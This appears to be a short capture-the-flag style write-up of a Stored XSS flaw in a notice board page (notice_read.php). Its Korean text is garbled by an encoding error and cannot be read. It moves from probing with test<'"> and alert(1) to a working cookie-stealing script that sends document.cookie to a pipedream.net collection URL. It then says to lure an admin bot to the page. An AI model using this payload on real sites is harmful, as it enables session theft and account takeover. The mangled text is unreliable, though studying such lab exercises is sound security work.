์ทจ์ฝ์ ์ค๋ช
: Stored XSS
์ทจ์ฝ์ ๋ฐ์ ์์น : notice_read.php
ํ์๊ฐ์
ํ ๋ก๊ทธ์ธ
๊ฒ์ํ์ด ์์ผ๋ ๊ธ๋ถํฐ ์จ๋ดค์ต๋๋ค.
ํน์๋ฌธ์ ์ฝ์
์ด ๊ฐ๋ฅํ์ง ํ์ธํ๊ธฐ ์ํด ์ ๋ชฉ,๋ด์ฉ์ ๋ชจ๋ test<'">๋ฅผ ๋ฃ์ด๋ด.
์์ฑํ ๊ฒ์๊ธ ํด๋ฆญํด์๋ณด๋
contents์ ๋ฌ๋ฆฌ title์ Html Entity ์นํ์ด ์๋ ๊ฒ์ ํ์ธํจ.
๊บฝ์ ๋ฅผ ๋ฃ์ ์ ์์ผ๋ ์คํฌ๋ฆฝํธ๋ฅผ ๋ฃ์ด๋ด.
์๋์ฌ๋ถ ํ์ธ๋ถํฐ ํ๊ธฐ์ํด <script>alert(1)</script>์ ์ฝ์
.
์์ฑํ ๊ฒ์๋ฌผ ํด๋ฆญํ๋ฉด ์ ์๋ํ๋ ๊ฒ์ ํ์ธ!
์คํฌ๋ฆฝํธ๊ฐ ์ ์๋ํ๋ ์ฟ ํคํ์ทจ์ฝ๋๋ฅผ ๋ฃ๊ณ ๊ฒ์๋ฌผ์ ํด๋ฆญํด๋ด.
<script>var cookieData = document.cookie;var i =new Image();i.src = "https://en2hyoic3j7mi.x.pipedream.net/?cookie=" + cookieData;</script>
๊ณต๊ฒฉ์ ์๋ฒ๋ก ์ฟ ํค๊ฐ์ด ์ ๋๋ก ๋์ด์ค๊ณ ์๋ค!
์ฟ ํค๊ฐ์ด ๋์ค์ง ์๋๋ค๋ฉด alert(document.cookie)๋ฅผ ์ฐ์ด๋ณด๊ณ ๋น ์ฐฝ์ด ์ถ๋ ฅ๋๋ฉด
https://velog.io/@dmkr9845/document.cookie-%EC%95%88%EB%90%A8
๊ธ์ ์ฐธ๊ณ ํ์.
๊ด๋ฆฌ์Bot์๊ฒ ํด๋น ํ์ด์ง URL์ ๋ณด๋ด์ ์ฟ ํค๊ฐ์ด ๋์ด์ค๋ฉด ์ฑ๊ณต!